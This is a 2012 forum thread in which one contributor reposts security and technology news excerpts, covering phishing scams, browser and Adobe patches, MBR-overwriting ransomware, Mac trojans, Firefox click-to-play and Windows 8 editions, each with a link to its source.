CIO - Email phishing scams have grown more sophisticated since they first began popping up in corporate inboxes in the 1990s. Early phishing emails were relatively easy to detect as they were characterized by poor grammar and spelling. No legitimate business would send an email to customers chockfull of typos.

As email users grew wary of phishing attempts, cybercriminals have had to change their tactics and their lures. Today, phishers are churning out much more convincing and effective emails. Not only are the most persuasive specimens well-written, they are also often personalized, addressing the recipient by name. In addition, they replicate the look and feel of authentic emails from legitimate businesses down to the fonts, footers, logos and copyright statements those companies use in electronic correspondence with their customers.

Read more at :-
http://www.computerworld.com/s/article/9226056/How...

--
Was this reply relevant?
+0
-0
mogs CClip 29
Expert Contributor 11th Apr, 2012 06:00
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 11th Apr, 2012 21:49
Chrome Dev Channel Update
Tuesday, April 10, 2012 | 15:26
Labels: Dev updates
The Dev channel has been updated to 20.0.1096.1 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

Updated V8 - 3.10.0.5
file: downloads allowed again.
Enable the Chrome To Mobile page action for users with compatible registered devices [r130312]
Fixed issues 120430, 118960, 120978, 118715

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 30
Expert Contributor 11th Apr, 2012 21:52
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe patches Reader vulnerabilities, removes bundled Flash Player
Four critical vulnerabilities were addressed and several security changes were made in Adobe Reader 10.1.3 and 9.5.1

By Lucian Constantin | IDG News Service

Adobe Systems released new versions of Adobe Reader 10.x and 9.x on Tuesday, addressing four arbitrary code execution vulnerabilities and making several security-related changes to the product, including the removal of the bundled Flash Player component from the 9.x branch.

All of the vulnerabilities fixed in the newly released Adobe Reader 10.1.3 and Adobe Reader 9.5.1 versions could be exploited by an attacker to crash the application and potentially take control of the affected system, Adobe said in its APSB12-08 security bulletin. Users are advised to install these updates as soon as possible.

[ The Web browser is your portal to the world -- as well as the conduit that lets in many security threats. InfoWorld's expert contributors show you how to secure your Web browsers in this "Web Browser Security Deep Dive" PDF guide. ]

The company also announced that Adobe Reader 9.5.1 no longer includes authplay.dll, a Flash Player library that was bundled with previous versions of the program to enable the rendering of Flash content embedded in PDF documents.

The presence of the authplay.dll component in Adobe Reader has caused some security issues in the past, primarily because of the inconsistent update schedules for Adobe Reader and Flash Player.

Authplay.dll contains much of the stand-alone Flash Player's code, which also means that it shares most of the latter's vulnerabilities. However, while Flash Player is patched by Adobe when needed, Adobe Reader used to follow a more strict quarterly update cycle.

Read more at :-
http://www.infoworld.com/d/security/adobe-patches-...

--
Was this reply relevant?
+0
-0
mogs CClip 31
Expert Contributor 11th Apr, 2012 21:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft’s Patch Tuesday has four critical fixes

Update or suffer the consequences
By Dave Neal
Wed Apr 11 2012, 14:21
SOFTWARE PATCH FACTORY Microsoft has issued six security fixes in its April Patch Tuesday release, four of which are rated critical.
The four critical patches, and two given the less severe 'important' ranking, will fix 11 vulnerabilities, the firm said.
If you are good and update your systems now, you will be fixing various remote code execution vulnerabilities in Microsoft Windows, Internet Explorer and Microsoft Office.
One of the fixes is gaining the most attention though, even from Microsoft. "We list MS12-027 as our highest priority security update to deploy this month because we are aware of very limited, targeted attacks taking advantage of [the] CVE-2012-0158 vulnerability using specially crafted Office documents as [an] exploit vector," said the firm in an apparently hastily written blog post.
"People who install the MS012-027 patch are protected against CVE-2012-0158 so we recommend applying the update right away."
This weighting was backed up by security firm Qualys, where CTO Wolfgang Kandek said that it affects an "unusually wide-range" of Microsoft products. These include Microsoft Office 2003 through 2010 on Windows, SQL Server 2000 through 2008 R2, Biztalk Server 2002, Commerce Server 2002 through 2009 R2, Visual Foxpro 8 and Visual Basic 6 Runtime.
The other critical fixes tackle problems with Internet Explorer, excluding one found at the recent Pwn2own contest, though Kandek imagines that a patch for that will follow next month.

http://www.theinquirer.net/inquirer/news/2167072/m...

--
Was this reply relevant?
+0
-0
mogs CClip 32
Expert Contributor 12th Apr, 2012 08:43
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Users Targeted with Account Verification Scams Credentials that protect Google accounts are highly valuable for cybercriminals because they are used to access a number of services. That’s probably why scammers have launched a new campaign that’s designed to steal usernames and passwords.


According to Sophos experts, the emails bear the subject Account Verification and look something like this:

Dear Account User,

Thanks for updating your e-mail address with us.We changed your recovery e-mail address in our files to [fakeaddress]@hotmail.com.If this is correct, you can disregard this e-mail. If the new e-mail address is not correct or you did not request this change. Follow the instruction in updating your account http://accounts.google.com

However, Failure to do so may result in account suspension permanently.

Thanks for using Gmail!.
Sincerely
Gmail!.

As usual, the threat that ends the email is designed to make the future victim comply with the request without giving it too much thought.

So once the link from the notification is clicked, the user is taken to a page that almost perfectly replicates a Google login webpage, hosted on a compromised domain.

Read more at :-
http://news.softpedia.com/news/Google-Users-Target...

--
Was this reply relevant?
+0
-0
mogs CClip 33
Expert Contributor 12th Apr, 2012 22:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Ransomware stops Windows from booting by replacing its master boot record
Ransomware asks users to pay up before letting them start Windows

By Lucian Constantin
April 12, 2012 12:17 PM ET
IDG News Service - A new ransomware variant prevents infected computers from loading Windows by replacing their master boot record (MBR) and displays a message asking users for money, according to security researchers from Trend Micro.

"Based on our analysis, this malware copies the original MBR and overwrites it with its own malicious code," said Cris Pantanilla, a threat response engineer at Trend Micro, in a blog post on Thursday. "Right after performing this routine, it automatically restarts the system for the infection take effect."

The MBR is a piece of code that resides in the first sectors of the hard drive and starts the boot loader. The boot loader then loads the OS.

Instead of starting the Windows boot loader, the rogue MBR installed by the new ransomware displays a message that asks users to deposit a sum of money into a particular account via an online payment service called QIWI, in order to receive an unlock code for their computers.

"This code will supposedly resume operating system to load and remove the infection," Pantanilla said. "When the unlock code is used, the MBR routine is removed."

As the name implies, ransomware applications hold something belonging to the victim in ransom until they pay a sum of money. This type of malware is considered the next step in the evolution of scareware, malicious programs that scare users into paying money.

The majority of ransomware applications disable important system functionality or encrypt documents and pictures, but this is the first ransomware program that Trend Micro researchers have seen replacing the MBR to prevent the system from starting.

More at :-
http://www.computerworld.com/s/article/9226155/Ran...

--
Was this reply relevant?
+0
-0
mogs CClip 34
Expert Contributor 12th Apr, 2012 22:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Security Holes Reported in HTC, Collabera, CMC and Quick Heal Sites Security researcher Shadab Siddiqui identified a number of cross-site scripting (XSS) vulnerabilities in websites owned by the mobile phone manufacturer HTC, TATA-owned IT solution provider CMC Limited, IT firm Collabera, and Quick Heal, an Indian company that offers security products.


The screenshots provided by the researcher clearly demonstrate the existence of the security holes that can be easily leveraged to steal user cookies, launch phishing attacks and cause other types of damage to users.

The only thing with XSS vulnerabilities is that they require a certain level of user interaction when exploited, but as we’ve seen in numerous cases, that is not an impediment for skilled cybercriminals.

HTC and Quick Heal have been notified regarding the presence of these flaws around one month ago, CMC Limited and Collabera being informed at the end of March.

According to Siddiqui, he retested the sites and found that Collabera and Quick Heal addressed the issues, which shouldn’t come as a surprise, especially since they’re both companies that are active in the IT sector.

However, as in previous situations, we must note that it’s a shame some organizations fail to work together with security researchers to fix the flaws in their systems. Most experts we’ve seen are more than happy to collaborate with a firm that has a poorly coded and unsecured website.

More at :-
http://news.softpedia.com/news/Security-Holes-Repo...

--
Was this reply relevant?
+0
-0
mogs CClip 35
Expert Contributor 12th Apr, 2012 22:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
EU to examine security of connected devices The European Commission (EC) has begun an investigation into the security and ethics surrounding web-connected appliances.
The Commission has opened up a public consultation to collect data on the opinions and expectations that businesses, researchers and citizens hold on the growth of connected devices and web-enabled appliances.

The commission said that the information it gathers would help to shape its policies and rulings on matters of privacy and security for what it calls the 'internet of things.'
"An Internet of Things with intelligence embedded into everyday objects is the next big thing," said EC vice president for the digital agenda Neelie Kroes.
"I want to promote an Internet of Things that serves our economic and societal goals, whilst preserving security, privacy and the respect of ethical values."
The survey asks for opinions and concerns on matters ranging from personal privacy and identity protection to the role of the government in mandating information security and delivering reference architectures for systems.
The study is open to both citizens and businesses as well as advocacy groups and industry professionals.

More at :-
http://www.v3.co.uk/v3-uk/news/2167526/eu-examine-...

--
Was this reply relevant?
+0
-0
mogs CClip 36
Expert Contributor 13th Apr, 2012 09:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Developer leaks Microsoft product plans for next two years

Launch details on Office 15, Phone and IE 10
By Iain Thomson in San Francisco

Updated A Microsoft developer has taken the unusual step of publishing a partial Redmond roadmap for some of the company's most important software.

Maarten Visser, CEO of Dutch cloud developer consultancy Meetroo, posted the plans, which were issued by Redmond at the end of last year, on his Twitter stream and they include launch dates for product as Office 15, Windows Phone and IE 10. Microsoft has confirmed the veracity of the images, but warns you shouldn't bet the bank on them.


"We often provide forward-looking information to our partners and customers under our confidentially agreements with them. This information contains our best estimates and is, in no way, final or definitive," Microsoft told The Register in an emailed statement.

Read more at :-
http://www.theregister.co.uk/2012/04/12/microsoft_...

--
Was this reply relevant?
+0
-0
mogs CClip 37
Expert Contributor 13th Apr, 2012 09:35
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Kaspersky Lab suspends Flashback-removal tool
Macworld - Kaspersky Lab on Thursday suspended distribution of its tool to remove the Flashback malware attacking Mac computers, saying the tool itself was making unacceptable alterations to user computers. A replacement is expected soon.

The lab's Flashfake Removal Tool was suspended after Kaspersky discovered that it was erroneously removing user settings--including auto-start configurations, user configurations in browsers, and file sharing data--from infected computers. It had been in operation since Monday.

More at :-
http://www.computerworld.com/s/article/9226174/Kas...

--
Was this reply relevant?
+0
-0
mogs CClip 38
Expert Contributor 13th Apr, 2012 09:40
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle to issue 88 security patches on Tuesday
The patch batch is even larger than the last one

By Chris Kanaracus
April 12, 2012 04:02 PM ET
IDG News Service - Oracle is planning to release 88 patches on Tuesday, covering vulnerabilities affecting a wide array of its products, according to a pre-release announcement posted to its website on Thursday.

Tuesday's scheduled patch release is larger than Oracle's last quarterly critical patch update in January, when it released 78 fixes.

More at :-
http://www.computerworld.com/s/article/9226169/Ora...

--
Was this reply relevant?
+0
-0
mogs CClip 39
Expert Contributor 13th Apr, 2012 09:42
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Chrome Stable Channel Update
| 16:33
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.162 on on Windows, Mac, Linux and Chrome Frame. This release fixes issues including:


Windows
Facebook page hangs after a while (Issue: 121141)
black screen on Hybrid Graphics system with GPU accelerated compositing enabled (Issue: 117371)

Mac
HTML5 audio doesn't work on some Mac computers (Issue: 109441)

Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 40
Expert Contributor 13th Apr, 2012 10:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
New fake anti-virus shakes down frightened file-sharers

Scareware brands Windows Registry Editor a smut 'tool', punts 'safe' torrents
By John Leyden • Get more from this author

Posted in Malware, 13th April 2012 07:27 GMT

Security researchers have discovered a strain of fake anti-virus software that tries to intimidate supposed file-sharers into paying for worthless software.


SFX Fake AV, first detected by freebie antivirus scanner firm Malwarebytes, blends the features of scareware with those more associated with ransomware Trojans. The malware stops any legitimate anti-virus package from running on compromised PCs, something common to other other scareware packages. But this particular strain of malware goes further than this by stopping Process Explorer (procexp.exe) and preventing browsers from loading – tactics designed to force marks to complete the ‘input credit card details’ screen and hand over money for the scamware.

More at :-
http://www.theregister.co.uk/2012/04/13/scareware_...

--
Was this reply relevant?
+0
-0
mogs CClip 41
Expert Contributor 13th Apr, 2012 19:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Firefox click-to-play feature will stop automated plug-in exploits
Mozilla plans to give Firefox users more control over the plug-in-based content displayed in their browsers

By Lucian Constantin | IDG News Service

Mozilla developers are working on a new Firefox feature that will block the automated display of plug-in-based content like Flash videos, Java applets or PDF files, and will protect users from attacks that exploit vulnerabilities in browser plug-ins to install malware on their computers.

Known as "click to play," this feature has been present in the popular NoScript Firefox security extension for many years, as well as in other browsers like Google Chrome and Opera.

When click-to-play is enabled, the browser displays static images instead of the active content that requires plug-ins to be displayed. Users need to click on those images in order to authorize the loading of each plug-in-based element.

"A couple days ago I landed an initial implementation of 'click-to-play plugins' in desktop Firefox," Mozilla software engineer Jared Wein said in a blog post on Wednesday.

Wein's implementation is available for testing in the latest Firefox nightly build, but there's still work to be done. "I'm currently working on implementing the ability for plugin activation settings to be remembered on a per-site basis," he said.

Read more at :-
http://www.infoworld.com/d/applications/firefox-cl...

--
Was this reply relevant?
+0
-0
mogs CClip 42
Expert Contributor 13th Apr, 2012 19:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

The 'Archive Team' Rescues User Content From Doomed Sites
Jason Scott and his merry band of hacker-archivists are trying to preserve our "digital history."

By Mark Sullivan | PC World | 13 April 12
What happens when your favorite Web host decides to go out of business and ice the content from thousands of users like you? Does all of that data just disappear, never to be seen again? It can happen, easily.
Under current law, a cloud or hosting site has a pretty much unlimited right to decide whether the content that people put on its pages remains available or vanishes. And a site that chooses to delete content is under no obligation to preserve the data or even to give the data's contributors advanced notice of when the purging will occur.

A typical hosting site's relevant terms of service make clear the host's claimed freedom from liability and its implied right to act unilaterally: "Your use of the [hosting site's] service is at your sole risk. [The hosting site] is not responsible for any and all files and data residing on your account on our servers. [The hosting site] does not maintain backup copies of customers web sites or e-mail. [The hosting site] cannot guarantee that the contents of a web site will never be deleted or corrupted, or that a backup of a web site will always be available. You agree to take full and sole responsibility for any and all files and data transferred to our servers and to maintain all appropriate backups of any any and all files and data stored on any [hosting site] server to which you have an account on."

The freedom of Web hosts to eradicate information bothers Jason Scott a lot, and he says it's why he formed the Archive Team, a "loose, rogue band of data preservation activists." The Archive Team looks for hosting sites that are about to go down--like Apple's MobileMe right now--and then makes a furious, coordinated effort to rescue the data before it disappears into the ether.



Read more: http://www.pcadvisor.co.uk/news/security/3350982/a...

--
Was this reply relevant?
+0
-0
mogs CClip 43
Expert Contributor 16th Apr, 2012 11:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Security-Related Phishing Schemes Most Effective, Trusteer Experts Find Experts from security solutions firm Trusteer highlight the fact that social engineering plays a very important role in phishing attacks. They also reveal that shady notifications that purport to address security issues are the most successful.


Cybercriminals have noticed that people fear for the safety of their data and the integrity of their bank accounts. That’s precisely why their malicious messages are designed to rush the potential victim in taking a decision.

In many situations, they also make threats to ensure that the user takes them seriously.

Here’s an example of a phishing email which informs bank customers that their accounts have been locked:

We locked your account because we needed to draw your attention to the fact that you didn’t complete our security online form for the year 2012. The form expires today and we need you to finish the process right away.

Accountholders may be concerned by the fact that they might not be able to access their funds and services, so they rush to complete the process and hand over the information requested by the crooks.

In another example, the scam artists tell victims that someone has been accessing their bank account:

Read more at :-
http://news.softpedia.com/news/Security-Related-Ph...

--
Was this reply relevant?
+0
-0
mogs CClip 44
Expert Contributor 16th Apr, 2012 19:48
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google wants to hire a doodler

It could be you
By Dave Neal
Mon Apr 16 2012, 15:05
INTERNET SEARCH OUTFIT Google is looking for someone that can come up with charming wastes of time like its Doodles that it uses to celebrate special occasions.
Google Doodles are those images of short film-type clips that will occasionally, though often more frequently than not, appear on its otherwise plain home page.
You might have noticed its Easter themed one, or the one that famously celebrated Pacman's birthday, those were Doodles and Google has a museum full of them. If you do not need that explanation you are quite possibly the person that the firm is looking to hire.
"First impressions matter. Every day, hundreds of millions of online users visit the Google homepage. Yes, to search. But also, to be delighted, informed, and surprised (And maybe even to laugh a little). The Google Doodle makes this possible -- it's the change that is constant on Google.com," says the introduction to Google's job advertisement for a Doodler.
"As a Product Graphic Designer/Illustrator you have the world's best platform to showcase your stylistic skills -- as well as your sense of humor, love of all things historical and imaginative artistry. From Jules Verne to Pac-Man, you have the reins to our brand and iconic logo and can run free with your innovative ideas. Go forth and doodle!"
The role includes the rather obvious responsibility for drawing, designing and animating Doodles, as well as an ability to keep coming up with new ones, within the constraints of the Google logo.
If you are thinking of applying you are going to want some sort of formal education, design experience, a showreel portfolio and something of a good imagination.
http://www.theinquirer.net/inquirer/news/2167980/g...

--
Was this reply relevant?
+0
-0
mogs CClip 45
Expert Contributor 16th Apr, 2012 19:53
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Two More Mac Trojans Discovered, But Don't Panic
Two benign Trojans target Apple's Mac OS exploiting the same Java flaw patched last week.

By Jared Newman | PC World | 16 April 12
Following the outbreak of the Flashback Mac Trojan, security researchers have spotted two more cases of Mac OS X malware. The good news is most users have little reason to worry about them.

Fast-growing Flashback botnet includes over 600,000 Macs, malware experts say
Unpatched Java vulnerability exploited to infect Macs with Flashback malware
Both cases are variants on the same Trojan, called SabPub, Kaspersky Lab Expert Costin Raiu wrote on Securelist.

(See Related: Flashback Malware Puts Apple in Security Spotlight: Experts Weigh In)

The first variant is known as Backdoor.OSX.SabPub.a. Like Flashback, this new threat was likely spread through Java exploits on Websites, and allows for remote control of affected systems. It was created roughly one month ago.

Read more: http://www.pcadvisor.co.uk/news/security/3351410/t...

--
Was this reply relevant?
+0
-0
mogs CClip 46
Expert Contributor 16th Apr, 2012 20:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Hoax Warns Users that RockMelt Browser Is a Virus “If you get an instant message from anyone about a new browser called RockMelt- it is a virus. DO NOT OPEN IT. I don’t care who sends it. Please repost. This is spread to your friends if you open it,” reads the post that circulates on Facebook.

As Hoax Slayer highlights, RockMelt is certainly not a virus, the only “suspicious” activity it performs is that it sends out invitations to the individuals found in the user’s contact list. Also, when the app was first released, some antivirus products identified the main executable file as being a piece of malware.

“Sorry about that, all. Because we're a new *.exe anti-virus software is raising objections. We're working with Norton and others to resolve but in the mean time you need to manually override,” RockMelt representatives wrote at the time.

RockMelt is a free web browser created by Tim Howes and Eric Vishria that focuses on the use of social media services, especially Facebook and Twitter.

Because it focuses on Facebook, after it’s installed, RockMelt requests customers to log in to their accounts. Once logged in, users can send out invitations to all their friends.

This advertising method may be the one that made people catalog the application as being malicious. Mainly because the “send invites to all friends” option is enabled by default and those who aren’t careful may find that their friends are “spammed.”

More at :-
http://news.softpedia.com/news/Hoax-Warns-Users-th...

--
Was this reply relevant?
+0
-0
mogs CClip 47
Expert Contributor 17th Apr, 2012 20:40
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Website vulnerabilities fall, but hackers become more skilled
Developers introduced 148 serious flaws on an average per website in 2011, according to WhiteHat Security

By Jeremy Kirk
April 16, 2012 11:06 PM ET
IDG News Service - The number of coding mistakes on websites continues to fall but companies are slow to fix issues that could be exploited by hackers working with improved attack tools, a security expert said.

The average number of serious vulnerabilities introduced to websites by developers in 2011 was 148, down from 230 in 2010 and 480 in 2009, said Jeremiah Grossman, chief technology officer for WhiteHat Security, which specializes in testing websites for security issues. Grossman spoke on the sidelines of the Open Web Application Security Project conference in Sydney on Monday.

The vulnerabilities are contained within custom website code and are not issues that can be fixed by applying patches from, for example, Microsoft or Oracle, Grossman said. According to WhiteHat Security statistics, it takes organizations an average of 100 days to fix about half of their vulnerabilities.

Read more at :-
http://www.computerworld.com/s/article/9226259/Web...

--
Was this reply relevant?
+0
-0
mogs CClip 48
Expert Contributor 17th Apr, 2012 20:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mozilla Enhances Plug-in Control in Firefox

Software engineer Jared Wein says the aim is to improve security, reduce memory usage, and open up the Web.

By Jeff Goldman

Mozilla is considering the addition of new functionality to the Firefox browser that will request user approval before running any content that requires a plug-in.

"When plugins.click_to_play is enabled, plugins will require an extra click to activate and start 'playing' content," Mozilla software engineer Jared Wein wrote in a recent blog post. "This is an incremental step towards securing our users, reducing memory usage, and opening up the web."

"This functionality prevents videos (including advertisements) on web sites from autoplaying, which is an annoyance to many users," The H Security reports. "It also conserves system resources as content presented through plugins often makes up a big part of the resources consumed by the browser. Another benefit of the click-to-play approach is that plugins only get loaded when the user actually clicks on the content in question. This limits the opportunities for 'drive-by' malware attacks by malicious content that targets plugin vulnerabilities in Flash and Java."

"Currently there are Firefox add-ons that do something similar, such as the NoScript extension that blocks JavaScript, Java, Flash, Silverlight and other content by default and Flashblock, which requires a user click on a static image before the plugin can load," notes Threatpost's Anne Saita. "But as of yet, no Web browser does it by default."

Still, ExtremeTech's Sebastian Anthony says this is likely to be a killing blow for browser add-ons. "With the recent shift towards HTML5, which has many multimedia features built in, Flash and Java are becoming more deprecated by the day," he writes.

http://www.esecurityplanet.com/browser-security/mo...

--
Was this reply relevant?
+0
-0
mogs CClip 49
Expert Contributor 17th Apr, 2012 20:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Chrome Stable Channel Update
Monday, April 16, 2012 | 12:21
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.163 on Mac.


This release fixes issues with fonts (Issue: 108645).


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 50
Expert Contributor 17th Apr, 2012 21:01
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Microsoft announces the editions it plans for Windows 8

Windows 8, 8 Pro, 8 Enterprise and 8 RT
By Lee Bell
Tue Apr 17 2012, 12:02
SOFTWARE HOUSE Microsoft has announced the editions of Windows 8 that will be available when it hits the market later this year.
Windows communications manager Brandon LeBlanc didn't surprise anyone when he announced in a blog post that Windows 8 will be the product name for the next editions of Windows. He said on the Windows Team Blog, "We have worked to make [the editions] easier for customers to know what will work best for them when they purchase a new Windows 8 PC or upgrade their existing PC."
However, his post did enlighten us somewhat when it said that both PCs and tablets powered by x86 processors, both 32-bit and 64 bit, will have two editions - Windows 8 and Windows 8 Pro.
Your bog-standard Windows 8 edition will include an updated Windows Explorer, Task Manager, better multi-monitor support and the ability to switch languages on the fly, something that was only available in the Enterprise and Ultimate editions of the previous versions of Windows.
According to LeBlanc, the professional version of Windows 8 has been designed to help technology enthusiasts and business professionals "obtain a broader set of Windows 8 technologies". As you'd expect, it includes all the working parts of the Windows 8 edition plus additional features for encryption, virtualisation, PC management and domain connectivity.
Windows Media Centre will also be available as an economical "media pack" add-on to Windows 8 Pro, the blog post said.
This Windows release will see a new member of the family when Microsoft launches the operating system later this year, Windows Run Time (RT). Also known as Windows on ARM or WOA PC, the single edition will only be available pre-installed on PCs and tablets powered by ARM processors. LeBlanc said it will also help enable new thin and lightweight devices with "impressive battery life". Impressive enough to last longer than one day, perhaps? It's doubtful.
Windows RT will include touch-optimised desktop versions of Microsoft Word, Excel, Powerpoint, and Onenote, as well as a new generation of cloud-enabled, touch-enabled and web-connected applications.
There will also be an enterprise edition of Windows 8 for customers with Software Assurance agreements, including everything that Windows 8 Pro boasts plus features for IT organisations that enable PC management and deployment, advanced security, virtualisation and mobility scenarios.
LeBlanc said that Microsoft will let us know more about its next Windows operating system in the coming months, including details on pricing, limited-time programmes and the promotions that it will make available to customers.

http://www.theinquirer.net/inquirer/news/2168216/m...

--
Was this reply relevant?
+0
-0
mogs CClip 51
Expert Contributor 17th Apr, 2012 21:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft reveals Skype for web browsers project

Looks to take on Google+ Hangouts
By Carly Page
Tue Apr 17 2012, 12:12
SOFTWARE HOUSE Microsoft has revealed that it plans to launch a browser-based Skype application, its own take on Google's Hangout service.
In what is the first major development since Microsoft acquired the VoIP and chat company last May, a job posting revealed that the company is looking to hire a software engineer for a "Skype for Browsers" position.
The listing shows that the application will be based around HTML5 and Java technologies, perfect for Microsoft's plug-in free Windows 8 web browser. This also differentiates the service from the Skype video call client now found on Facebook, which uses a plug-in rather than HTML5.

More at :-
http://www.theinquirer.net/inquirer/news/2168226/m...

--
Was this reply relevant?
+0
-0
mogs CClip 52
Expert Contributor 17th Apr, 2012 21:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Sends Notifications to 20,000 Hacked Site Owners.
“Is your site doing weird redirects? We just sent a ‘your site might be hacked’ message to 20K sites,” read a tweet posted by Matt Cutts, the head of the webspam team at Google, yesterday.

So, you may be wondering what Google has to do with website security and what they mean when they say weird redirects.

Search Engine Land informs that in many cases website owners and administrators are not aware that their assets have been compromised, mainly because the sites identified by Google as being overtaken only redirect visitors who access them from the search engine.

Since owners and admins rarely go to their sites from search engines, they’re unaware of the malicious operations that take place.

Regarding the systems used by Google to scan and block potentially infected websites, the company’s support page reveals the following:

This identification is based in part on guidelines set by StopBadware.org. Google uses its own criteria, procedures, and tools to identify sites that host or distribute badware. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

More at :-
http://news.softpedia.com/news/Google-Sends-Notifi...

--
Was this reply relevant?
+0
-0
mogs CClip 53
Expert Contributor 18th Apr, 2012 21:01
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Gmail outage affects up to 35 million people
By Tom Espiner , 18 April, 2012 12:13

A severe Gmail service disruption on Tuesday affected up to 10 percent of users, according to Google.

The outage, which saw up to 35 million users unable to access accounts, lasted just over an hour. The disruption began at 5.42pm BST on Tuesday, Google said on its apps status dashboard.

"We've determined that this issue affected less than 10 percent of the Google Mail users who attempted to access their accounts during the affected timeframe," Google said. "While we have resolved this issue with Google Mail, it's possible that some users may experience message delays because affected accounts weren't available to receive messages."

Google does not give official figures for numbers of Gmail users. However, ZDNet UK understands that around 350 million people use the email service.

Some users of the Ars Technica open forum complained that both work and personal email accounts had been affected.

http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
Was this reply relevant?
+0
-0
mogs CClip 54
Expert Contributor 18th Apr, 2012 21:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Chrome Dev 20.0.1105.0 Google seems to keep a steady flow of updates for Chrome these days. After updating the stable version of the browser, they released new builds for Android (check the new features here) and the Dev channel.

Google Chrome Dev 20.0.1105.0 focuses on fixing issues mainly on Windows. Among the problems affecting all supported platforms, there is the inability to remove individual cookies and failing to move bookmarks from a subfolder to its parent directory.

The new Dev build also brings to the table an updated JavaScript engine and fixes a crash caused by moving apps to a new app sheet (screen).

Windows specific issues fixed in this release refer to a crash in the Cloud Print connector when connecting via Remote Desktop, incorrect display of icons in the task switcher and a problem with dragging downloads to a different browser window.

http://news.softpedia.com/news/Download-Google-Chr...

Dev Channel Update
Tuesday, April 17, 2012 | 17:30
Labels: Dev updates
The Dev channel has been updated to 20.0.1105.0 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

All
Updated V8 - 3.10.2.1
Fixed issues - 121584, 122130, 122850, 123403
Fixed empty apps page crash. (Issue: 122214)

Windows
Fixed a crash in the Cloud Print connector when connecting via Remote Desktop (Issue: 122996)
Fixed incorrect program icon being shown in the task switcher. (Issue: 118368)
Fixed downloads page drag/drop. (Issue: 122946)

Known Issues
[Mac 10.6] Video isn’t displayed when entered into presentation mode (pressing cmd + shift + f) (Issue: 123911)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 55
Expert Contributor 18th Apr, 2012 21:31
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
The hidden danger of Windows 8 Microsoft Accounts Microsoft goes to great lengths to convince Windows 8 users to log on with an email address, but if your account gets hijacked you could find yourself locked out

By Woody Leonhard | InfoWorldFollow @infoworld

If you've been using the Windows 8 Consumer Preview, no doubt you've toyed with the idea of using a "Microsoft Account" log-in -- most commonly a Hotmail or Windows Live email address. But have you stopped to consider what happens if your Hotmail account gets hijacked?

I'm not concerned about computers connected to the domain. I'm worried about the mobile folks, the ones who work off the grid. They face an interesting challenge in Windows 8.

Windows 8 stacks the deck, trying to convince people to log on with an email address. Microsoft has rebranded many old accounts -- Windows Live ID, Hotmail ID, Zune, and Xbox Live IDs -- into a shiny new "Microsoft Account." When you sign in to Windows 8 with your Microsoft Account, you can download apps from the Windows Store and get into your SkyDrive data with just a click. Microsoft also synchronizes many of your settings -- including legacy desktop and Metro appearances and other settings -- IE favorites and history, Web sign-ins, and so on.

If you log on to Windows 8 with a regular "Local" user ID and password, you're a second-class citizen. The Music app sniffs, "To get the most from this app, switch from your local account to a Microsoft account." You have to sign in to the Microsoft Store. SkyDrive asks for a sign-in. Photos, too. So it's definitely to your advantage to set up a Microsoft Account and use your Hotmail or Live email address. (You can use any email address as a Microsoft Account, in fact, but the Windows 8 directions don't mention that option.)

Here's the problem.

